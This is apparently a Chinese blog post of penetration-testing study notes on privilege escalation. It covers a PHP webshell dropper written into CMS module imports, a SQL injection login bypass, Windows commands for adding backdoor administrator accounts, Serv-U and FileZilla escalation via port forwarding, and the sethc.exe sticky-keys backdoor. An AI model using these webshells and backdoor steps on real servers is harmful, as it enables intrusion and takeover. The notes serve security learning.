满天星
Fork me on GitHub

渗透测试学习笔记25-权限提升

发表于 | 分类于
本文字数: 2.8k | 阅读时长 ≈ 3 分钟 
帝国->
系统->数据表与系统模型->管理数据表->管理系统模型->导入
xx.php.mod

<?fputs(fopen("cao.php"."w"),"<?eval(\$_POST[cmd]);?>")?>

phpcms
界面->模板风格->search->修改,可视化->一句话
内容->选择附件上传->图片
系统设置->Ucenter api->一句话(要闭合)
00截断,存在注入漏洞  admin' or '1' = '1

提权

提权前的号角
windows提权
Linux提权


什么是提权:
主要针对网站测试过程中当测试某一网站时,通过各种漏洞提升WEBSHELL权限已夺得改服务器权限


入侵B网站,但是想跨A网站,需要提权


通常脚本所处的权限
ASP/php 匿名权限
ASPx USER权限
jsp通常是系统权限


Tomcat一般是管理员权限,或者system权限

setp c:\windows\system32\cmd.exe
ipconfig/tasklist/arp -a 不能实现,,这时需要上传aspx大马

在菜刀->大马上边执行cmd.exe

asp大马如果不知道密码的话,用?profile=a


收集信息
内外网
服务器系统和版本位数
服务器的补丁情况
服务器的安装软件情况
服务器的防护软件情况
端口情况
支持脚本情况
....


arp如果是静态,就没必要欺骗,动态C段才需要欺骗


信息收集常用命令
windows:
ipconfig/all 查看当前ip
net user 查看当前服务器账号情况
netstat -ano 查看当前服务器端口开发情况
ver 查看当前服务器操作系统
systeminfo 查看当前服务器配置信息(补丁情况)
tasklist /svc 查看当前服务器进程情况
taskkill -PID pid好 结束某个pid进程
taskkill /im qq.exe /f 结束qq进程
net user cracer cracer /add 添加一个用户名为cracer密码为cracer的用户
net localgroup administrators cracer /add 将用户cracer添加到管理员组
whoami 查看当前操作用户(当前权限)

Linux:
Is -al 查看当前目录下的文件和文件夹
pwd 查看当前操作路径
uname -a查看当前服务器内核信息


cmd命令执行
1.防护软件拦截
2.cmd被降权
3.组件被删除
找可读写目录上传cmd.exe,将执行的cmd.exe路径替换成上传的路径,再次调用执行


查找3389
1.注册表读取  大马可以直接读注册表
2.工具扫描
3.命令探针


WINDOWS提权:
第三方软件提权
溢出提权
启动项提权
破解hash提权
数据库提权


常见的第三方软件提权
FTP软件:(服务器一般都是上传软件)
server-u,g6ftp,FileZilla
远程管理软件
PCanywhere,radmin,vnc


server-u提权
有修改权限
0检查是否有可写权限 修改server-u默认安装目录下的ServUDaemon.ini
1.增加用户
2.连接
3.执行命令
quote site exec net user cracer cracer.com /add
quote site exec net localgroup administrators cracer /add
无修改权限
暴力破解md5
溢出提权

大马->ServU->SerevUDaemon.ini,如果不能保存,就破解它的密码
ftp>quote site exec +系统命令
win+R->mstsc->登录创建的用户

md5加密:zp123

溢出提权->
大马->Server-提权->自动创建一个DiskKill用户
忘记密码的话,找到serverUadmin.exe下载下来,然后打开代码审计->C32->拖进来,16进制->右键搜索->ANSII->搜索用户名


G6ftp提权
下载管理配置文件,将administrator管理密码破解
使用Icx端口转发(默认只允许本机连接)
lcx.exe -tran 8027 127.0.0.1 8021
使用客户端以管理员用户登录
创建用户并设置权限和执行的批处理文件
上传批处理
以创建的普通用户登录ftp
执行命令quote site x.bat
x.bat内容为添加系统用户 提权

(需要上传一个lcx.exe)
www.shodan.io ->搜索 弱口令/默认密码


filezilla提权
filezilla是一款开源的FTP服务器和客户端的软件
若安装了服务器端默认只侦听127.0.0.1的14747端口
并且默认安装目录下有两个敏感文件filezillaserver.xml(包含了用户信息)和filezillaserver interface.xml(包含了管理信息)
提权思路:
下载这两个文件,拿到管理密码
配置端口转发,登录远程管理ftpserver,创建ftp用户
分配权限,设置家目录为C:\
使用cmd.exe改名为sethc.exe替换c:\windows\system32\sethc.exe生成shift后门
连接3389按5次shift调出cmd.exe


大马->(1)Program->filezilla->执行cmd
站点根目录->data->复制路径
netstat -an | find "14147"
权限提升->端口转发->lcx.exe->上传->复制url
cmd->粘贴url->url -tran 14148 127.0.0.1 14147
将14147转发成任意机器的14148地址
将第三方软件提权的文件复制到VM里,先安装filezilla
连接到192.168.0.10 14148
新建用户
客户端直接执行就行
192.168.0.10 user pw
/windows/system32/sethc替换
mstsc->5次shift
explorer.exe 或者创建新用户
-------------本文结束期待您的评论-------------